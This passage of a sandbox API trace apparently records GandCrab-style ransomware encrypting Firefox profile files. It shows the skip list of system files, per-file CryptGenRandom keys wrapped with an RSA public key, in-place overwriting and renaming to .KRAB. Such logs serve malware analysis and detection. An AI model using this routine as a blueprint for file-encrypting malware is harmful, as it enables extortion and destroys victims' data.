(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\") returned 90 [0082.091] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*" [0082.091] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0x1023838 [0082.091] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.091] FindNextFileW (in: hFindFile=0x1023838, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0082.092] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.092] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.092] FindNextFileW (in: hFindFile=0x1023838, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0082.092] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0082.092] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0082.092] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a08d2ca4dee3d.lock" [0082.092] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.092] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 118 [0082.092] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\d2ca4a08d2ca4dee3d.lock") returned 113 [0082.092] lstrlenW (lpString=".lock") returned 5 [0082.092] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.093] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0082.093] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.093] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.093] FindNextFileW (in: hFindFile=0x1023838, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0082.093] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0082.093] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0082.093] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\KRAB-DECRYPT.txt" [0082.093] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.094] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\KRAB-DECRYPT.txt.KRAB") returned 111 [0082.094] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\KRAB-DECRYPT.txt") returned 106 [0082.094] lstrlenW (lpString=".txt") returned 4 [0082.094] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.094] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0082.094] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.094] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\KRAB-DECRYPT.txt") returned 106 [0082.095] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\KRAB-DECRYPT.txt") returned 106 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0082.095] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0082.095] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.095] FindNextFileW (in: hFindFile=0x1023838, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0082.095] FindClose (in: hFindFile=0x1023838 | out: hFindFile=0x1023838) returned 1 [0082.095] CloseHandle (hObject=0x7ec) returned 1 [0082.096] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.096] lstrcmpW (lpString1="parent.lock", lpString2=".") returned 1 [0082.096] lstrcmpW (lpString1="parent.lock", lpString2="..") returned 1 [0082.096] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="parent.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\parent.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\parent.lock" [0082.096] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.096] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\parent.lock.KRAB") returned 96 [0082.096] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\parent.lock") returned 91 [0082.096] lstrlenW (lpString=".lock") returned 5 [0082.096] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.096] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0082.097] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.097] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.097] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.097] lstrcmpW (lpString1="permissions.sqlite", lpString2=".") returned 1 [0082.097] lstrcmpW (lpString1="permissions.sqlite", lpString2="..") returned 1 [0082.097] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="permissions.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite" [0082.097] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.098] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite.KRAB") returned 103 [0082.098] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned 98 [0082.098] lstrlenW (lpString=".sqlite") returned 7 [0082.098] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.098] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0082.098] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.098] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned 98 [0082.098] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite") returned 98 [0082.098] lstrcmpiW (lpString1="permissions.sqlite", lpString2="desktop.ini") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="autorun.inf") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ntuser.dat") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="iconcache.db") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="bootsect.bak") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="boot.ini") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ntuser.dat.log") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="thumbs.db") returned -1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="KRAB-DECRYPT.html") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ntldr") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="NTDETECT.COM") returned 1 [0082.099] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Bootfont.bin") returned 1 [0082.099] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.099] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011678) returned 1 [0082.101] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0082.101] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.102] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.102] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0082.102] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0082.102] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.102] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010a40) returned 1 [0082.104] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0082.104] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.104] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.104] CryptGenRandom (in: hProv=0x1010a40, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0082.104] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0082.104] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.105] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011348) returned 1 [0082.106] CryptImportKey (in: hProv=0x1011348, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023838) returned 1 [0082.106] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.106] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.107] GetLastError () returned 0x0 [0082.107] CryptDestroyKey (hKey=0x1023838) returned 1 [0082.107] CryptReleaseContext (hProv=0x1011348, dwFlags=0x0) returned 1 [0082.107] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011898) returned 1 [0082.108] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023838) returned 1 [0082.108] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.108] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.109] GetLastError () returned 0x0 [0082.109] CryptDestroyKey (hKey=0x1023838) returned 1 [0082.109] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0082.109] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\permissions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0082.118] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0082.119] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0082.119] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x18000, lpOverlapped=0x0) returned 1 [0082.153] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfffe8000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.153] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x18000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x18000, lpOverlapped=0x0) returned 1 [0082.154] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0082.154] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.158] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.159] CloseHandle (hObject=0x7ec) returned 1 [0082.159] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.159] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\permissions.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\permissions.sqlite.krab")) returned 1 [0082.160] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.160] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0082.160] lstrcmpW (lpString1="places.sqlite", lpString2=".") returned 1 [0082.160] lstrcmpW (lpString1="places.sqlite", lpString2="..") returned 1 [0082.160] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="places.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite" [0082.160] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0082.161] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite.KRAB") returned 98 [0082.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 93 [0082.161] lstrlenW (lpString=".sqlite") returned 7 [0082.161] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.161] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0082.161] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 93 [0082.161] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite") returned 93 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="desktop.ini") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="autorun.inf") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="ntuser.dat") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="iconcache.db") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="bootsect.bak") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="boot.ini") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="ntuser.dat.log") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="thumbs.db") returned -1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="KRAB-DECRYPT.html") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="ntldr") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="NTDETECT.COM") returned 1 [0082.162] lstrcmpiW (lpString1="places.sqlite", lpString2="Bootfont.bin") returned 1 [0082.162] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0082.162] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10113d0) returned 1 [0082.164] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0082.165] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.165] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.165] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0082.165] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0082.165] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.165] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011128) returned 1 [0082.167] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0082.167] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0082.167] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0082.167] CryptGenRandom (in: hProv=0x1011128, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0082.167] CryptReleaseContext (hProv=0x1011128, dwFlags=0x0) returned 1 [0082.168] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.168] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10113d0) returned 1 [0082.169] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023838) returned 1 [0082.169] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.169] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.170] GetLastError () returned 0x0 [0082.170] CryptDestroyKey (hKey=0x1023838) returned 1 [0082.170] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0082.170] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010f08) returned 1 [0082.171] CryptImportKey (in: hProv=0x1010f08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023838) returned 1 [0082.171] CryptGetKeyParam (in: hKey=0x1023838, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0082.171] CryptEncrypt (in: hKey=0x1023838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0082.172] GetLastError () returned 0x0 [0082.172] CryptDestroyKey (hKey=0x1023838) returned 1 [0082.172] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0082.172] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\places.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0082.172] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0082.173] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0082.173] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.261] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.261] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.263] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.297] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.297] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x100000, lpOverlapped=0x0) returned 1 [0082.299] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x100000, lpOverlapped=0x0) returned 1 [0082.385] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.385] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, 